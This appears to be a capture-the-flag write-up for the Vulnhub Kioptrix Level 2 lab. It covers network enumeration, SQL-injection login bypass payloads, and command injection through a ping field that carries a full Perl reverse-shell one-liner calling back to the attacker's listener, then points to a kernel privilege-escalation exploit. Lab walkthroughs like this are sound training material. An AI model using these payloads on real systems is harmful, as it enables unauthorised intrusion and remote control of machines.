So, I’m here with my second write-up for Vulnhub – Kioptrix Level 2 challenge. So, we usually start by doing some enumeration on services. but before that we have to find out the IP Address of our machine.
Information Gathering
netdiscover will scan for all devices connected on your network or you can use arp-scan your choice.
Arp-scan
arp-scan --interface=eth0 --localnet
Now we have our target IP Address let’s take a look which services are running on that server.
Nmap
nmap -oA nmap -sC -sV 192.168.1.8
These are the services running on targeted machine.
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 443/tcp open https 631/tcp open ipp 3306/tcp open mysql
Port 80 is Running Apache httpd 2.0.52 (CentOS)
Let’s take a look, http://192.168.1.8
Remote System Administration Login, Username and Password field let’s take a look at page source might we find something interesting.
<form method="post" name="frmLogin" id="frmLogin" action="index.php"> <table width="300" border="1" align="center" cellpadding="2" cellspacing="2"> <tr> <td colspan='2' align='center'> <b>Remote System Administration Login</b> </td> </tr> <tr> <td width="150">Username</td> <td><input name="uname" type="text"></td> </tr> <tr> <td width="150">Password</td> <td> <input name="psw" type="password"> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" name="btnLogin" value="Login"> </td> </tr> </table> </form> <!-- Start of HTML when logged in as Administator -->
Nothing special but since we do not have any security checks on username and password field we can try SQLi.
BurpSuite
Below is the request which we’re sending and check the response we got.
Request:
POST /index.php HTTP/1.1 Host: 192.168.1.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.8/ Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 55 uname=1' or '1' = '11&psw=1' or '1' = '1&btnLogin=Login
Response:
<!-- Start of HTML when logged in as Administator --> <form name="ping" action="pingit.php" method="post" target="_blank"> <table width='600' border='1'> <tr valign='middle'> <td colspan='2' align='center'> <b>Welcome to the Basic Administrative Web Console<br></b> </td> </tr> <tr valign='middle'> <td align='center'> Ping a Machine on the Network: </td> <td align='center'> <input type="text" name="ip" size="30"> <input type="submit" value="submit" name="submit"> </td> </td> </tr> </table> </form>
So, it was simply SQL Injection (1′ or ‘1’ = ‘1).
We have tested manual SQL Injection. Let’s test SQLmap now.
SQLmap
It generated the payload for us!
Payload: uname=-2356' OR 1260=1260-- DpYb&psw=admin&btnLogin=Login
Reverse Shell
There’s an another field to run a ping command and tested SQL Injection vulnerabilities again and found a simple ‘;‘ semicolon can be used to bypass this.
So this is what i did.
192.168.1.1; perl -e 'use Socket;$i="192.168.1.9";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And i ran “nc -lvp 1337″ on my machine to get reverse shell.
Now we’re going after root access.
Root
By running LinEnum.sh script we couldn’t find anything interesting but you take a look at kernel version we have some exploits available for that kernel version.
Don’t Miss: A Guide To Linux Privilege Escalation
[-] Kernel information (continued): Linux version 2.6.9-55.EL ([email protected]) (gcc version 3.4.6 20060404 (Red Hat 3.4.6 -8))
After doing Google searches found that this exploit might work so i gave it a try and it actually worked.
Don’t Miss: Linux Privilege Escalation Scripts
https://www.exploit-db.com/exploits/9545/
